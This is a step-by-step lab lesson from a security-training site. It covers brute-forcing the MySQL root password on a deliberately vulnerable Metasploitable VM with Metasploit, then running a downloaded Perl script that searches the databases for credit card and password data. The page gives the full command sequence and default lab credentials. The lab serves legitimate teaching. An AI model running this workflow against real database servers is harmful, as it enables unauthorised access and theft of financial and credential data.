ComputerSecurityStudent (CSS) [Login] [Join Now]




|SECURITY TOOLS >> Metasploitable Project >> Exploits >> Current Page |Views: 15513

(Metasploitable Project: Lesson 11)

{ MySQL Bruteforce Password Guessing, Obtain Sensitive Data }


Section 0. Background Information
  1. What is the scenario?
    • Have you ever heard stories of how hacker's were able to break into databases remotely and retrieve sensitive information? Well, this lesson illustrates how easy and quickly sensitive information can be obtained if the database administrator's password is in the dictionary.

  2. What is Metasploitable 
  3. Pre-Requisite Lab
  4. What is auxiliary/scanner/mysql/mysql_login?
    • This Metasploit module simply queries the MySQL instance for a specific
      user/pass (default is root with blank).

  5. What is mysql_HKD.pl?
    • This is a MySQL post-exploit tool used after you discover the database password using tool like Metasploit's MySQL Login Utility.
    • It has the ability to search all Database, Tables and Fields for sensitive strings that contain words like credit card or password or whatever you want to search for.

  6. Lab Notes
    • In this lab we will do the following:
      1. Run a basic and NMAP Scan.
      2. Run an NMAP Scan user service version detection.
      3. Search for the mysql daemon in both NMAP scan.
      4. Use Metasploit to correctly guess the MySQL root password.
      5. Use mysql_HKD.pl to obtain sensitive information.

  7. Legal Disclaimer
    • As a condition of your use of this Web site, you warrant to computersecuritystudent.com that you will not use this Web site for any purpose that is unlawful or that is prohibited by these terms, conditions, and notices.
    • In accordance with UCC § 2-316, this product is provided with "no warranties, either express or implied." The information contained is provided "as-is", with "no guarantee of merchantability."
    • In addition, this is a teaching website that does not condone malicious behavior of any kind.
    • You are on notice, that continuing and/or using this lab outside your "own" test environment is considered malicious and is against the law.
    • © 2015 No content replication of any kind is allowed without express written permission.

 

Section 1: Start Up the Metasploitable VM
  1. Start Up VMWare Player
    • Instructions:
      1. Click the Start Button
      2. Type Vmplayer in the search box
      3. Click on Vmplayer

     

  2. Open a Virtual Machine
    • Instructions:
      1. Click on Open a Virtual Machine

     

  3. Open the Metasploitable VM
    • Instructions:
      1. Navigate to where the Metasploitable VM is located
      2. Click on on the Metasploitable VM
      3. Click on the Open Button

     

  4. Edit the Metasploitable VM
    • Instructions:
      1. Select Metasploitable2-Linux VM
      2. Click Edit virtual machine settings

     

  5. Edit the Metasploitable VM
    • Instructions:
      1. Click on "Network Adapter NAT"
      2. Select the radio button "Bridged: Connected directly to the physical network"
      3. Click on the OK button
    • Warning:
      • By changing from NAT to Bridged opens the VM and network up to potential attacks.
      • To maintain a safe network, you could (1) skip this section and only use the host-only network, (2) unplug your router from the internet, or (3) use an ACL to not allow traffic into your network, etc.

     

  6. Play the Metasploitable VM
    • Instructions:
      1. Click on the Metasploitable VM
      2. Click on Play virtual machine

 

Section 2: Determine Metasploitable IP Address
  1. Logging into Metasploitable
    • Instructions
      1. Username: msfadmin
      2. Password: msfadmin or whatever you changed it to in lesson 1.

     

  2. Retrieve IP Address
    • Instructions:
      1. ifconfig
      2. Record Your Metasploitable IP Address.
    • Note(FYI):
      • This is the IP Address of the Victim Machine.
      • My IP Address is 192.168.1.116.
      • Record your IP Address.

     

Section 4: Start Up the BackTrack5R1 VM
  1. Start Up VMWare Player
    • Instructions:
      1. Click the Start Button
      2. Type Vmplayer in the search box
      3. Click on Vmplayer

     

  2. Open a Virtual Machine
    • Instructions:
      1. Click on Open a Virtual Machine

     

  3. Open the BackTrack5R1 VM
    • Instructions:
      1. Navigate to where the BackTrack5R1 VM is located
      2. Click on on the BackTrack5R1 VM
      3. Click on the Open Button

     

  4. Edit the BackTrack5R1 VM
    • Instructions:
      1. Select BackTrack5R1 VM
      2. Click Edit virtual machine settings

     

  5. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Network Adapter
      2. Click on the Bridged Radio button
      3. Click on the OK Button

     

  6. Play the BackTrack5R1 VM
    • Instructions:
      1. Click on the BackTrack5R1 VM
      2. Click on Play virtual machine

     

  7. Login to BackTrack
    • Instructions:
      1. Login: root
      2. Password: toor or <whatever you changed it to>.

     

  8. Bring up the GNOME
    • Instructions:
      1. Type startx

     

  9. Start up a terminal window
    • Instructions:
      1. Click on the Terminal Window

     

  10. Obtain the IP Address
    • Instructions:
      1. ifconfig -a
      2. Record your IP Address (See Picture)
    • Note(FYI):
      • My IP address 192.168.1.139.
      • In your case, it will probably be different.
      • This is the machine that will be use to attack the victim machine (Metasploitable).

 

Section 5: Set MySQL Password
  1. Become Root (On Metasploitable)
    • Instructions:
      1. sudo su -
      2. msfadmin or whatever you changed it to in lesson 1.
    • Note(FYI):
      • sudo, allows a permitted user to execute as a command either as themselves or another user.
      • su -, switch username.  If you don't supply a username after the "-", then root is assumed.

     

  2. Set MySql Database root password
    • Instructions:
      1. mysqladmin -uroot password msfadmin
      2. mysql -uroot -pmsfadmin -e 'show databases;'
    • Note(FYI):
      • The MySQL root password is set to blank by default in this Metasploitable VM.
      • mysqladmin is used to set the root password to msfadmin
      • mysql is used to log into the MySQL database.  But in this case, we use the -e option to execute the follow command (show databases).

     

Section 6: Scanning the Victim with NMAP
  1. Run Basic NMAP Scan against the Metasploitable VM  (On BackTrack)
    • Note(FYI):
      • Replace(192.168.1.116) with your Metasploitable VM obtained from [Section 2, Step 2].
    • Instructions:
      1. nmap 192.168.1.116
      2. Notice nmap show that mysql is running on 3306/tcp.
    • Note(FYI):
      • nmap is being used to scan all the TCP ports for listening services.
      • This is pretty great, but it would be nice to know the version of each service.

     

  2. NMAP Version Scan
    • Note(FYI):
      • Replace(192.168.1.116) with your Metasploitable VM obtained from (Section 2, Step 2).
    • Instructions:
      1. nmap -sV 192.168.1.116
      2. Notice nmap show that mysql is running on 3306/tcp.
    • Note(FYI):
      • nmap -sV is used to detect the version of each server.  It will take a while to run.
      • You can use version information to search places like http:\\www.exploit-db.com. In our case, we will use Metasploit to guess the password and mysql_HKD.pl to pull sensitive information.

 

Section 7: Create Password File
  1. Create Password File (On BackTrack)
    • Instructions:
      1. cd /var/tmp
      2. grep -v "^#" /pentest/passwords/john/password.lst | head > pw.txt
      3. echo "msfadmin" >> pw.txt
      4. cat pw.txt
    • Note(FYI):
      1. Use cd to change directory to the /var/tmp directory.
      2. Use grep to ignore (-v) any line in the password.1st file that begins (^) with a pound sign (#).
      3. Use head to display the first 10 lines of the password.1st file.
      4. Use the redirector operator (>) to send the output of instruction #2 into a new file called pw.txt.
      5. Use echo to display the string (msfadmin) and use the append operating (>>) to add (msfadmin) to the end of the pw.txt file.
      6. Use cat to display the contents of the pw.txt file.  This is the file that metasploit will use to guess the MySQL root password.

 

Section 8: Attacking the Victim with Metasploit
  1. Start Up Metasploit msfconsole (On BackTrack)
    • Instructions:
      1. msfconsole
    • Note(FYI):
      • Metasploit takes about 5 to 20 seconds to start up.

     

  2. msfconsole screen
    • Note(FYI):
      • This is the msfconsole
      • Your picture (Rabbit, Cow, Graffit, Cyber Missle, etc) will probably be different than mine.

     

  3. Search for Metasploit Module
    • Instructions:
      1. search mysql
      2. Highlight and Right Click on auxiliary/scanner/mysql/mysql_login
      3. Select Copy

     

  4. Set Metasploit Module
    • Instructions:
      1. use auxiliary/scanner/mysql/mysql_login
      2. show options
      3. In the follow steps we will set PASS_FILE and RHOSTS

     

  5. Set the PASS_FILE and RHOSTS
    • Note(FYI):
      • Replace(192.168.1.116) with your Metasploitable VM obtained from (Section 2, Step 2).
    • Instructions:
      1. set PASS_FILE /var/tmp/pw.txt
      2. set RHOSTS 192.168.1.116
      3. set USERNAME root
      4. show options
    • Note(FYI):
      1. PASS_FILE is set to a file that contains possible MySQL passwords.
      2. RHOST is set to Metasploitable's IP Address.
      3. USERNAME is set to root.  If we can guess the root password, then we can collect whatever we want.

     

  6. Brute Force MySQL Password
    • Instructions:
      1. exploit
      2. Notice the root password (msfadmin) was successfully guessed.

 

Section 9: Obtain Sensitive Data with mysql_HKD.pl
  1. Download mysql_HKD.pl
    • Note(FYI):
      • By continuing to download and use mysql_HKD.pl you agree with the Computer Security Student, LLC Legal Agreement.
    • Instructions:
      1. cd /var/tmp
      2. wget http://www.computersecuritystudent.com/SECURITY_TOOLS/METASPLOITABLE/EXPLOIT/lesson11/mysql_HKD.pl.TXT
      3. mv mysql_HKD.pl.TXT mysql_HKD.pl
      4. chmod 700 mysql_HKD.pl
      5. ls -l mysql_HKD.pl
    • Note(FYI):
      1. Use cd to change directory into the /var/tmp directory.
      2. Use wget to download mysql_HKD.pl.TXT
      3. Use mv to rename mysql_HKD.pl.TXT -to- mysql_HKD.pl
      4. Use chmod to provide mysql_HKD.pl with read(4), write(2), and execute(1) permissions.
      5. Use ls to list the details (-l) of the mysql_HKD.pl file.

     

  2. Execute mysql_HKD.pl (Search for string credit)
    • Note(FYI):
      • By continuing to download and use mysql_HKD.pl you agree with the Computer Security Student, LLC Legal Agreement.
    • Instructions:
      1. ./mysql_HKD.pl -ip 192.168.1.116 -u root -pw msfadmin -s "credit"
      2. Notice how mysql_HKD.pl displays all the database or tables or fields that contain the string (credit).
      3. Notice how mysql_HKD.pl displays all the sensitive content from the database tables that it found possible credit card information in.
    • Note(FYI):
      1. mysql_HKD.pl is used to search for an obtain sensitive information from an MySQL database table assuming you used some other tool like metasploit to retrieve the root password.
      2. -ip 192.168.1.116, allows you to specify the IP address where the MySQL database is located. (E.g., Metasploitable)
      3. -u root, allows you to specify any MySQL userID.
      4. -pw msfadmin, allows you to specify the guessed password.
      5. -s "credit", allows you to specify a search string.

     

  3. Execute mysql_HKD.pl (Search for string password)
    • Note(FYI):
      • By continuing to download and use mysql_HKD.pl you agree with the Computer Security Student, LLC Legal Agreement.
    • Instructions:
      1. ./mysql_HKD.pl -ip 192.168.1.116 -u root -pw msfadmin -s "password"
      2. Notice how mysql_HKD.pl displays all the database or tables or fields that contain the string (password).
      3. Notice how mysql_HKD.pl displays all the sensitive content from the database tables that it found possible credit card information in.
    • Note(FYI):
      1. -ip 192.168.1.116, allows you to specify the IP address where the MySQL database is located. (E.g., Metasploitable)
      2. -u root, allows you to specify any MySQL userID.
      3. -pw msfadmin, allows you to specify the guessed password.
      4. -s "password", allows you to specify a search string.

     

  4. Execute mysql_HKD.pl (Search for string credit|password)
    • Note(FYI):
      • By continuing to download and use mysql_HKD.pl you agree with the Computer Security Student, LLC Legal Agreement.
    • Instructions:
      1. ./mysql_HKD.pl -V -ip 192.168.1.116 -u root -pw msfadmin -s "credit|password"
    • Note(FYI):
      1. -V, allows you to display verbose details to the screen.
      2. -ip 192.168.1.116, allows you to specify the IP address where the MySQL database is located. (E.g., Metasploitable)
      3. -u root, allows you to specify any MySQL userID.
      4. -pw msfadmin, allows you to specify the guessed password.
      5. -s "credit|password", allows you to search for multiple strings by placing a "|" between them.

     

Section 10: Proof of Lab
  1. Proof of Lab (On BackTrack)
    • Instructions
      1. cd /var/tmp
      2. ls -l mysql_hkd.txt*
      3. wc -l mysql_hkd.txt*
      4. tail -7 mysql_hkd.txt_credit
      5. date
      6. echo "Your Name"
        • Replace the string "Your Name" with your actual name.
        • e.g., echo "John Gray"
    • Proof of Lab Instructions
      1. Press the <Ctrl> and <Alt> key at the same time.
      2. Press the <PrtScn> key.
      3. Paste into a word document
      4. Upload to Moodle


Help ComputerSecurityStudent
pay for continued research,
resources & bandwidth